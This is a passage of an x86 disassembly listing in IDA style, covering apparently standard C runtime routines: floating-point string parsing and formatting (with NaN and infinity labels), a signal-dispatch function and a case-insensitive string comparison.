var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
xor eax, eax
push edi
mov edi, [ebp+arg_8]
lea esi, [ebp+var_58]
mov [ebp+var_8], esi
mov [ebp+var_2C], eax
mov [ebp+var_1C], 1
mov [ebp+var_C], eax
mov [ebp+var_14], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
mov [ebp+arg_8], edi
loc_420D38: ; CODE XREF: sub_420CF7+58�j
mov cl, [edi]
cmp cl, 20h
jz short loc_420D4E
cmp cl, 9
jz short loc_420D4E
cmp cl, 0Ah
jz short loc_420D4E
cmp cl, 0Dh
jnz short loc_420D51
loc_420D4E: ; CODE XREF: sub_420CF7+46�j
; sub_420CF7+4B�j ...
inc edi
jmp short loc_420D38
; ---------------------------------------------------------------------------
loc_420D51: ; CODE XREF: sub_420CF7+55�j
; sub_420CF7+B5�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_420FD0 ; default
; jumptable 00420D5D case 10
jmp off_421101[eax*4] ; switch jump
loc_420D64: ; DATA XREF: .text:off_421101�o
cmp bl, 31h ; jumptable 00420D5D case 0
jl short loc_420D75
cmp bl, 39h
jg short loc_420D75
loc_420D6E: ; CODE XREF: sub_420CF7+CE�j
; sub_420CF7+129�j
push 3
jmp loc_420F8F
; ---------------------------------------------------------------------------
loc_420D75: ; CODE XREF: sub_420CF7+70�j
; sub_420CF7+75�j
cmp bl, byte_432CB8
jnz short loc_420D84
loc_420D7D: ; CODE XREF: sub_420CF7+135�j
push 5
jmp loc_420FC6
; ---------------------------------------------------------------------------
loc_420D84: ; CODE XREF: sub_420CF7+84�j
movsx eax, bl
sub eax, 2Bh
jz short loc_420DAE
dec eax
dec eax
jz short loc_420DA2
sub eax, 3
jz loc_420E3B
mov [ebp+var_8], esi
dec edi
jmp loc_420F4D
; ---------------------------------------------------------------------------
loc_420DA2: ; CODE XREF: sub_420CF7+97�j
push 2
pop eax
mov [ebp+var_2C], 8000h
jmp short loc_420D51
; ---------------------------------------------------------------------------
loc_420DAE: ; CODE XREF: sub_420CF7+93�j
and [ebp+var_2C], 0
push 2
pop eax
jmp short loc_420D51
; ---------------------------------------------------------------------------
loc_420DB7: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
xor eax, eax ; jumptable 00420D5D case 1
inc eax
cmp bl, 31h
mov [ebp+var_14], eax
jl short loc_420DC7
cmp bl, 39h
jle short loc_420D6E
loc_420DC7: ; CODE XREF: sub_420CF7+C9�j
cmp bl, byte_432CB8
jnz short loc_420DD6
loc_420DCF: ; CODE XREF: sub_420CF7+182�j
push 4
jmp loc_420FC6
; ---------------------------------------------------------------------------
loc_420DD6: ; CODE XREF: sub_420CF7+D6�j
cmp bl, 2Bh
jz short loc_420E10
cmp bl, 2Dh
jz short loc_420E10
cmp bl, 30h
jz loc_420D51
loc_420DE9: ; CODE XREF: sub_420CF7+1DA�j
cmp bl, 43h
jle loc_420F49
cmp bl, 45h
jle short loc_420E09
cmp bl, 63h
jle loc_420F49
cmp bl, 65h
jg loc_420F49
loc_420E09: ; CODE XREF: sub_420CF7+FE�j
push 6
jmp loc_420FC6
; ---------------------------------------------------------------------------
loc_420E10: ; CODE XREF: sub_420CF7+E2�j
; sub_420CF7+E7�j ...
dec edi
push 0Bh
jmp loc_420FC6
; ---------------------------------------------------------------------------
loc_420E18: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
cmp bl, 31h ; jumptable 00420D5D case 2
jl short loc_420E26
cmp bl, 39h
jle loc_420D6E
loc_420E26: ; CODE XREF: sub_420CF7+124�j
cmp bl, byte_432CB8
jz loc_420D7D
cmp bl, 30h
jnz loc_420F9B
loc_420E3B: ; CODE XREF: sub_420CF7+9C�j
xor eax, eax
inc eax
jmp loc_420D51
; ---------------------------------------------------------------------------
loc_420E43: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
mov [ebp+var_14], 1 ; jumptable 00420D5D case 3
jmp short loc_420E63
; ---------------------------------------------------------------------------
loc_420E4C: ; CODE XREF: sub_420CF7+178�j
cmp [ebp+var_C], 19h
jnb short loc_420E5D
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
jmp short loc_420E60
; ---------------------------------------------------------------------------
loc_420E5D: ; CODE XREF: sub_420CF7+159�j
inc [ebp+var_10]
loc_420E60: ; CODE XREF: sub_420CF7+164�j
mov bl, [edi]
inc edi
loc_420E63: ; CODE XREF: sub_420CF7+153�j
movzx eax, bl
push eax
call sub_41E6D9
test eax, eax
pop ecx
jnz short loc_420E4C
cmp bl, byte_432CB8
jnz short loc_420EBF
jmp loc_420DCF
; ---------------------------------------------------------------------------
loc_420E7E: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
xor eax, eax ; jumptable 00420D5D case 4
inc eax
cmp [ebp+var_C], 0
mov [ebp+var_14], eax
mov [ebp+var_28], eax
jnz short loc_420EB1
jmp short loc_420E95
; ---------------------------------------------------------------------------
loc_420E8F: ; CODE XREF: sub_420CF7+1A1�j
dec [ebp+var_10]
mov bl, [edi]
inc edi
loc_420E95: ; CODE XREF: sub_420CF7+196�j
cmp bl, 30h
jz short loc_420E8F
jmp short loc_420EB1
; ---------------------------------------------------------------------------
loc_420E9C: ; CODE XREF: sub_420CF7+1C6�j
cmp [ebp+var_C], 19h
jnb short loc_420EAE
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
dec [ebp+var_10]
loc_420EAE: ; CODE XREF: sub_420CF7+1A9�j
mov bl, [edi]
inc edi
loc_420EB1: ; CODE XREF: sub_420CF7+194�j
; sub_420CF7+1A3�j
movzx eax, bl
push eax
call sub_41E6D9
test eax, eax
pop ecx
jnz short loc_420E9C
loc_420EBF: ; CODE XREF: sub_420CF7+180�j
cmp bl, 2Bh
jz loc_420E10
cmp bl, 2Dh
jz loc_420E10
jmp loc_420DE9
; ---------------------------------------------------------------------------
loc_420ED6: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
movzx eax, bl ; jumptable 00420D5D case 5
push eax
mov [ebp+var_28], 1
call sub_41E6D9
test eax, eax
pop ecx
jz loc_420F9B
push 4
jmp loc_420F8F
; ---------------------------------------------------------------------------
loc_420EF6: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
cmp bl, 31h ; jumptable 00420D5D case 6
lea ecx, [edi-2]
mov [ebp+arg_8], ecx
jl short loc_420F0A
cmp bl, 39h
jle loc_420F8D
loc_420F0A: ; CODE XREF: sub_420CF7+208�j
movsx eax, bl
sub eax, 2Bh
jz loc_420FC4
dec eax
dec eax
jz loc_420FB8
sub eax, 3
jnz loc_420FDE
loc_420F27: ; CODE XREF: sub_420CF7+2A2�j
push 8
jmp loc_420FC6
; ---------------------------------------------------------------------------
loc_420F2E: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
mov [ebp+var_24], 1 ; jumptable 00420D5D case 8
jmp short loc_420F3A
; ---------------------------------------------------------------------------
loc_420F37: ; CODE XREF: sub_420CF7+246�j
mov bl, [edi]
inc edi
loc_420F3A: ; CODE XREF: sub_420CF7+23E�j
cmp bl, 30h
jz short loc_420F37
cmp bl, 31h
jl short loc_420F49
cmp bl, 39h
jle short loc_420F8D
loc_420F49: ; CODE XREF: sub_420CF7+F5�j
; sub_420CF7+103�j ...
dec edi
loc_420F4A: ; CODE XREF: sub_420CF7+2A7�j
; sub_420CF7+2E2�j
mov [ebp+var_8], esi
loc_420F4D: ; CODE XREF: sub_420CF7+A6�j
; sub_420CF7+2EC�j ...
cmp [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_4210AC
push 18h
pop eax
cmp [ebp+var_C], eax
jbe short loc_420F74
cmp [ebp+var_41], 5
jl short loc_420F6D
inc [ebp+var_41]
loc_420F6D: ; CODE XREF: sub_420CF7+271�j
dec esi
inc [ebp+var_10]
mov [ebp+var_C], eax
loc_420F74: ; CODE XREF: sub_420CF7+26B�j
cmp [ebp+var_C], 0
jbe loc_4210D3
jmp loc_421048
; ---------------------------------------------------------------------------
loc_420F83: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
cmp bl, 31h ; jumptable 00420D5D case 7
jl short loc_420F96
cmp bl, 39h
jg short loc_420F96
loc_420F8D: ; CODE XREF: sub_420CF7+20D�j
; sub_420CF7+250�j
push 9
loc_420F8F: ; CODE XREF: sub_420CF7+79�j
; sub_420CF7+1FA�j
pop eax
dec edi
jmp loc_420D51
; ---------------------------------------------------------------------------
loc_420F96: ; CODE XREF: sub_420CF7+28F�j
; sub_420CF7+294�j
cmp bl, 30h
jz short loc_420F27
loc_420F9B: ; CODE XREF: sub_420CF7+13E�j
; sub_420CF7+1F2�j
mov edi, [ebp+arg_8]
jmp short loc_420F4A
; ---------------------------------------------------------------------------
loc_420FA0: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
cmp [ebp+arg_18], 0 ; jumptable 00420D5D case 11
jz short loc_420FCC
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+arg_8], ecx
jz short loc_420FC4
dec eax
dec eax
jnz short loc_420FDE
loc_420FB8: ; CODE XREF: sub_420CF7+221�j
or [ebp+var_1C], 0FFFFFFFFh
push 7
pop eax
jmp loc_420D51
; ---------------------------------------------------------------------------
loc_420FC4: ; CODE XREF: sub_420CF7+219�j
; sub_420CF7+2BB�j
push 7
loc_420FC6: ; CODE XREF: sub_420CF7+88�j
; sub_420CF7+DA�j ...
pop eax
jmp loc_420D51
; ---------------------------------------------------------------------------
loc_420FCC: ; CODE XREF: sub_420CF7+2AD�j
push 0Ah
pop eax
dec edi
loc_420FD0: ; CODE XREF: sub_420CF7+60�j
; sub_420CF7+66�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00420D5D case 10
jnz loc_420D51
jmp loc_420F4A
; ---------------------------------------------------------------------------
loc_420FDE: ; CODE XREF: sub_420CF7+22A�j
; sub_420CF7+2BF�j
mov [ebp+var_8], esi
mov edi, ecx
jmp loc_420F4D
; ---------------------------------------------------------------------------
loc_420FE8: ; CODE XREF: sub_420CF7+66�j
; DATA XREF: .text:off_421101�o
mov [ebp+var_8], esi ; jumptable 00420D5D case 9
mov [ebp+var_24], 1
xor esi, esi
jmp short loc_42100B
; ---------------------------------------------------------------------------
loc_420FF6: ; CODE XREF: sub_420CF7+320�j
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_42101B
mov bl, [edi]
inc edi
loc_42100B: ; CODE XREF: sub_420CF7+2FD�j
movzx eax, bl
push eax
call sub_41E6D9
test eax, eax
pop ecx
jnz short loc_420FF6
jmp short loc_421020
; ---------------------------------------------------------------------------
loc_42101B: ; CODE XREF: sub_420CF7+30F�j
mov esi, 1451h
loc_421020: ; CODE XREF: sub_420CF7+322�j
mov [ebp+var_20], esi
movzx eax, bl
jmp short loc_42102E
; ---------------------------------------------------------------------------
loc_421028: ; CODE XREF: sub_420CF7+340�j
mov al, [edi]
inc edi
movzx eax, al
loc_42102E: ; CODE XREF: sub_420CF7+32F�j
push eax
call sub_41E6D9
test eax, eax
pop ecx
jnz short loc_421028
mov esi, [ebp+var_8]
dec edi
jmp loc_420F4D
; ---------------------------------------------------------------------------
loc_421042: ; CODE XREF: sub_420CF7+355�j
dec [ebp+var_C]
inc [ebp+var_10]
loc_421048: ; CODE XREF: sub_420CF7+287�j
dec esi
cmp byte ptr [esi], 0
jz short loc_421042
lea eax, [ebp+var_3C]
push eax
push [ebp+var_C]
lea eax, [ebp+var_58]
push eax
call sub_420C13
mov eax, [ebp+var_20]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_1C], ecx
jge short loc_42106D
neg eax
loc_42106D: ; CODE XREF: sub_420CF7+372�j
add eax, [ebp+var_10]
cmp [ebp+var_24], ecx
jnz short loc_421078
add eax, [ebp+arg_10]
loc_421078: ; CODE XREF: sub_420CF7+37C�j
cmp [ebp+var_28], ecx
jnz short loc_421080
sub eax, [ebp+arg_14]
loc_421080: ; CODE XREF: sub_420CF7+384�j
cmp eax, 1450h
jg short loc_4210B5
cmp eax, 0FFFFEBB0h
jl short loc_4210CC
push [ebp+arg_C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_42186B
mov edx, [ebp+var_3C]
mov ebx, [ebp+var_3C+2]
mov esi, [ebp+var_36]
mov eax, [ebp+var_32]
add esp, 0Ch
jmp short loc_4210DB
; ---------------------------------------------------------------------------
loc_4210AC: ; CODE XREF: sub_420CF7+25F�j
mov [ebp+var_18], 4
jmp short loc_4210D3
; ---------------------------------------------------------------------------
loc_4210B5: ; CODE XREF: sub_420CF7+38E�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_18], 2
jmp short loc_4210DB
; ---------------------------------------------------------------------------
loc_4210CC: ; CODE XREF: sub_420CF7+395�j
mov [ebp+var_18], 1
loc_4210D3: ; CODE XREF: sub_420CF7+281�j
; sub_420CF7+3BC�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_4210DB: ; CODE XREF: sub_420CF7+3B3�j
; sub_420CF7+3D3�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_2C]
mov [ecx+2], ebx
mov [ecx+6], esi
mov [ecx+0Ah], ax
mov eax, [ebp+var_18]
mov [ecx], dx
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C596
leave
retn
sub_420CF7 endp
; ---------------------------------------------------------------------------
off_421101 dd offset loc_420D64 ; DATA XREF: sub_420CF7+66�r
dd offset loc_420DB7 ; jump table for switch statement
dd offset loc_420E18
dd offset loc_420E43
dd offset loc_420E7E
dd offset loc_420ED6
dd offset loc_420EF6
dd offset loc_420F83
dd offset loc_420F2E
dd offset loc_420FE8
dd offset loc_420FD0
dd offset loc_420FA0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421131 proc near ; CODE XREF: sub_42010C+36�p
var_30 = byte ptr -30h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_14]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_24], 0CCh
mov [ebp+var_23], 0CCh
mov [ebp+var_22], 0CCh
mov [ebp+var_21], 0CCh
mov [ebp+var_20], 0CCh
mov [ebp+var_1F], 0CCh
mov [ebp+var_1E], 0CCh
mov [ebp+var_1D], 0CCh
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0FBh
mov [ebp+var_19], 3Fh
mov [ebp+var_8], 1
mov edx, eax
jz short loc_42119E
mov byte ptr [ebx+2], 2Dh
jmp short loc_4211A2
; ---------------------------------------------------------------------------
loc_42119E: ; CODE XREF: sub_421131+65�j
mov byte ptr [ebx+2], 20h
loc_4211A2: ; CODE XREF: sub_421131+6B�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_4211B7
test edi, edi
jnz short loc_4211B7
cmp [ebp+arg_0], edi
jz loc_4212AA
loc_4211B7: ; CODE XREF: sub_421131+77�j
; sub_421131+7B�j
cmp dx, si
jnz short loc_421234
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_4211D0
cmp [ebp+arg_0], 0
jz short loc_4211DF
loc_4211D0: ; CODE XREF: sub_421131+97�j
test edi, 40000000h
jnz short loc_4211DF
push offset a1Snan ; "1#SNAN"
jmp short loc_421225
; ---------------------------------------------------------------------------
loc_4211DF: ; CODE XREF: sub_421131+9D�j
; sub_421131+A5�j
test cx, cx
jz short loc_4211F9
cmp edi, 0C0000000h
jnz short loc_4211F9
cmp [ebp+arg_0], 0
jnz short loc_421220
push offset a1Ind ; "1#IND"
jmp short loc_421208
; ---------------------------------------------------------------------------
loc_4211F9: ; CODE XREF: sub_421131+B1�j
; sub_421131+B9�j
cmp edi, eax
jnz short loc_421220
cmp [ebp+arg_0], 0
jnz short loc_421220
push offset a1Inf ; "1#INF"
loc_421208: ; CODE XREF: sub_421131+C6�j
lea eax, [ebx+4]
push eax
call sub_41BFE0
mov byte ptr [ebx+3], 5
loc_421215: ; CODE XREF: sub_421131+101�j
and [ebp+var_8], 0
pop ecx
pop ecx
jmp loc_42138C
; ---------------------------------------------------------------------------
loc_421220: ; CODE XREF: sub_421131+BF�j
; sub_421131+CA�j ...
push offset a1Qnan ; "1#QNAN"
loc_421225: ; CODE XREF: sub_421131+AC�j
lea eax, [ebx+4]
push eax
call sub_41BFE0
mov byte ptr [ebx+3], 6
jmp short loc_421215
; ---------------------------------------------------------------------------
loc_421234: ; CODE XREF: sub_421131+89�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_18], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_16], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_18]
push eax
mov [ebp+var_E], dx
mov [ebp+var_12], edi
call sub_42186B
add esp, 0Ch
cmp [ebp+var_E], 3FFFh
jb short loc_421295
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
inc esi
call sub_421633
pop ecx
pop ecx
loc_421295: ; CODE XREF: sub_421131+152�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_4212B3
movsx eax, si
add edi, eax
test edi, edi
jg short loc_4212B3
loc_4212AA: ; CODE XREF: sub_421131+80�j
mov byte ptr [ebx+4], 30h
jmp loc_4213B0
; ---------------------------------------------------------------------------
loc_4212B3: ; CODE XREF: sub_421131+16E�j
; sub_421131+177�j
cmp edi, 15h
jle short loc_4212BB
push 15h
pop edi
loc_4212BB: ; CODE XREF: sub_421131+185�j
movzx esi, [ebp+var_E]
sub esi, 3FFEh
and [ebp+var_E], 0
mov [ebp+arg_8], 8
loc_4212D1: ; CODE XREF: sub_421131+1AD�j
lea eax, [ebp+var_18]
push eax
call sub_420BB8
dec [ebp+arg_8]
pop ecx
jnz short loc_4212D1
test esi, esi
jge short loc_4212FB
neg esi
and esi, 0FFh
jle short loc_4212FB
loc_4212EE: ; CODE XREF: sub_421131+1C8�j
lea eax, [ebp+var_18]
push eax
call sub_420BE6
dec esi
pop ecx
jnz short loc_4212EE
loc_4212FB: ; CODE XREF: sub_421131+1B1�j
; sub_421131+1BB�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+arg_8], eax
jle short loc_421358
mov [ebp+var_C], ecx
loc_42130B: ; CODE XREF: sub_421131+222�j
lea esi, [ebp+var_18]
lea edi, [ebp+var_30]
movsd
movsd
lea eax, [ebp+var_18]
push eax
movsd
call sub_420BB8
lea eax, [ebp+var_18]
push eax
call sub_420BB8
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_18]
push eax
call sub_420B5A
lea eax, [ebp+var_18]
push eax
call sub_420BB8
mov al, byte ptr [ebp+var_E+1]
mov ecx, [ebp+arg_8]
and byte ptr [ebp+var_E+1], 0
add al, 30h
add esp, 14h
inc [ebp+arg_8]
dec [ebp+var_C]
mov [ecx], al
jnz short loc_42130B
mov eax, [ebp+arg_8]
loc_421358: ; CODE XREF: sub_421131+1D5�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_4213A5
jmp short loc_42136F
; ---------------------------------------------------------------------------
loc_421366: ; CODE XREF: sub_421131+240�j
cmp byte ptr [eax], 39h
jnz short loc_421373
mov byte ptr [eax], 30h
dec eax
loc_42136F: ; CODE XREF: sub_421131+233�j
cmp eax, ecx
jnb short loc_421366
loc_421373: ; CODE XREF: sub_421131+238�j
cmp eax, ecx
jnb short loc_42137B
inc eax
inc word ptr [ebx]
loc_42137B: ; CODE XREF: sub_421131+244�j
inc byte ptr [eax]
loc_42137D: ; CODE XREF: sub_421131+27A�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_42138C: ; CODE XREF: sub_421131+EA�j
mov eax, [ebp+var_8]
loc_42138F: ; CODE XREF: sub_421131+292�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C596
leave
retn
; ---------------------------------------------------------------------------
loc_42139F: ; CODE XREF: sub_421131+276�j
cmp byte ptr [eax], 30h
jnz short loc_4213A9
dec eax
loc_4213A5: ; CODE XREF: sub_421131+231�j
cmp eax, ecx
jnb short loc_42139F
loc_4213A9: ; CODE XREF: sub_421131+271�j
cmp eax, ecx
jnb short loc_42137D
mov byte ptr [ecx], 30h
loc_4213B0: ; CODE XREF: sub_421131+17D�j
and word ptr [ebx], 0
and byte ptr [ebx+5], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
inc eax
jmp short loc_42138F
sub_421131 endp
; =============== S U B R O U T I N E =======================================
sub_4213C5 proc near ; CODE XREF: sub_4213F3+72�p
mov ecx, dword_432C8C
mov eax, edx
push edi
loc_4213CE: ; CODE XREF: sub_4213C5+19�j
cmp [eax+4], esi
jz short loc_4213E0
lea edi, [ecx+ecx*2]
add eax, 0Ch
lea edi, [edx+edi*4]
cmp eax, edi
jb short loc_4213CE
loc_4213E0: ; CODE XREF: sub_4213C5+C�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
pop edi
jnb short loc_4213F0
cmp [eax+4], esi
jz short locret_4213F2
loc_4213F0: ; CODE XREF: sub_4213C5+24�j
xor eax, eax
locret_4213F2: ; CODE XREF: sub_4213C5+29�j
retn
sub_4213C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4213F3 proc near ; CODE XREF: sub_41CEC1+38A5�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0042153B SIZE 00000031 BYTES
push 20h
push offset stru_42CE08
call __SEH_prolog
xor ecx, ecx
mov [ebp+var_1C], ecx
mov eax, [ebp+arg_0]
dec eax
dec eax
jz short loc_421475
dec eax
dec eax
jz short loc_421455
sub eax, 4
jz short loc_421455
sub eax, 3
jz short loc_421455
sub eax, 4
jz short loc_421448
sub eax, 6
jz short loc_42143B
dec eax
jz short loc_42142E
or eax, 0FFFFFFFFh
jmp loc_421566
; ---------------------------------------------------------------------------
loc_42142E: ; CODE XREF: sub_4213F3+31�j
mov esi, offset dword_4815C4
mov edi, dword_4815C4
jmp short loc_421480
; ---------------------------------------------------------------------------
loc_42143B: ; CODE XREF: sub_4213F3+2E�j
mov esi, offset dword_4815C0
mov edi, dword_4815C0
jmp short loc_421480
; ---------------------------------------------------------------------------
loc_421448: ; CODE XREF: sub_4213F3+29�j
mov esi, offset dword_4815C8
mov edi, dword_4815C8
jmp short loc_421480
; ---------------------------------------------------------------------------
loc_421455: ; CODE XREF: sub_4213F3+1A�j
; sub_4213F3+1F�j ...
call sub_4191CF
mov ebx, eax
mov [ebp+var_24], ebx
mov edx, [ebx+54h]
mov esi, [ebp+arg_0]
call sub_4213C5
mov esi, eax
add esi, 8
mov edi, [esi]
xor ecx, ecx
jmp short loc_42148A
; ---------------------------------------------------------------------------
loc_421475: ; CODE XREF: sub_4213F3+16�j
mov esi, offset dword_4815BC
mov edi, dword_4815BC
loc_421480: ; CODE XREF: sub_4213F3+46�j
; sub_4213F3+53�j ...
mov [ebp+var_1C], 1
mov ebx, [ebp+var_24]
loc_42148A: ; CODE XREF: sub_4213F3+80�j
mov [ebp+var_20], edi
cmp edi, 1
jz loc_421564
cmp edi, ecx
jnz short loc_4214A1
push 3
call sub_418434
loc_4214A1: ; CODE XREF: sub_4213F3+A5�j
cmp [ebp+var_1C], ecx
jz short loc_4214AF
push ecx
call sub_41A1D6
pop ecx
xor ecx, ecx
loc_4214AF: ; CODE XREF: sub_4213F3+B1�j
mov [ebp+ms_exc.disabled], ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_4214C4
cmp eax, 0Bh
jz short loc_4214C4
cmp eax, 4
jnz short loc_4214DF
loc_4214C4: ; CODE XREF: sub_4213F3+C5�j
; sub_4213F3+CA�j
mov edx, [ebx+58h]
mov [ebp+var_28], edx
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_42150B
mov edx, [ebx+5Ch]
mov [ebp+var_2C], edx
mov dword ptr [ebx+5Ch], 8Ch
loc_4214DF: ; CODE XREF: sub_4213F3+CF�j
cmp eax, 8
jnz short loc_42150B
mov eax, dword_432C80
loc_4214E9: ; CODE XREF: sub_4213F3+116�j
mov [ebp+var_30], eax
mov edx, dword_432C84
mov esi, dword_432C80
add edx, esi
cmp eax, edx
jge short loc_42150D
lea edx, [eax+eax*2]
mov esi, [ebx+54h]
mov [esi+edx*4+8], ecx
inc eax
jmp short loc_4214E9
; ---------------------------------------------------------------------------
loc_42150B: ; CODE XREF: sub_4213F3+DD�j
; sub_4213F3+EF�j
mov [esi], ecx
loc_42150D: ; CODE XREF: sub_4213F3+109�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_42152E
cmp [ebp+arg_0], 8
jnz short loc_42153B
push dword ptr [ebx+5Ch]
push 8
call edi
pop ecx
jmp short loc_421540
sub_4213F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421526 proc near ; DATA XREF: .text:stru_42CE08�o
mov edi, [ebp-20h]
mov ebx, [ebp-24h]
xor ecx, ecx
sub_421526 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42152E proc near ; CODE XREF: sub_4213F3+11E�p
cmp [ebp-1Ch], ecx
jz short locret_42153A
push ecx
call sub_41A142
pop ecx
locret_42153A: ; CODE XREF: sub_42152E+3�j
retn
sub_42152E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4213F3
loc_42153B: ; CODE XREF: sub_4213F3+127�j
push [ebp+arg_0]
call edi
loc_421540: ; CODE XREF: sub_4213F3+131�j
pop ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_421553
cmp eax, 0Bh
jz short loc_421553
cmp eax, 4
jnz short loc_421564
loc_421553: ; CODE XREF: sub_4213F3+154�j
; sub_4213F3+159�j
mov ecx, [ebp+var_28]
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_421564
mov eax, [ebp+var_2C]
mov [ebx+5Ch], eax
loc_421564: ; CODE XREF: sub_4213F3+9D�j
; sub_4213F3+15E�j ...
xor eax, eax
loc_421566: ; CODE XREF: sub_4213F3+36�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_4213F3
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_4215CA
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_42158C: ; CODE XREF: .text:004215B9�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_4215BB
or al, al
jz short loc_4215BB
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_4215A8
cmp ah, bl
ja short loc_4215A8
add ah, dh
loc_4215A8: ; CODE XREF: .text:004215A0�j
; .text:004215A4�j
cmp al, bh
jb short loc_4215B2
cmp al, bl
ja short loc_4215B2
add al, dh
loc_4215B2: ; CODE XREF: .text:004215AA�j
; .text:004215AE�j
cmp ah, al
jnz short loc_4215C1
sub ecx, 1
jnz short loc_42158C
loc_4215BB: ; CODE XREF: .text:00421592�j
; .text:00421596�j
xor ecx, ecx
cmp ah, al
jz short loc_4215CA
loc_4215C1: ; CODE XREF: .text:004215B4�j
mov ecx, 0FFFFFFFFh
jb short loc_4215CA
neg ecx
loc_4215CA: ; CODE XREF: .text:0042157B�j
; .text:004215BF�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
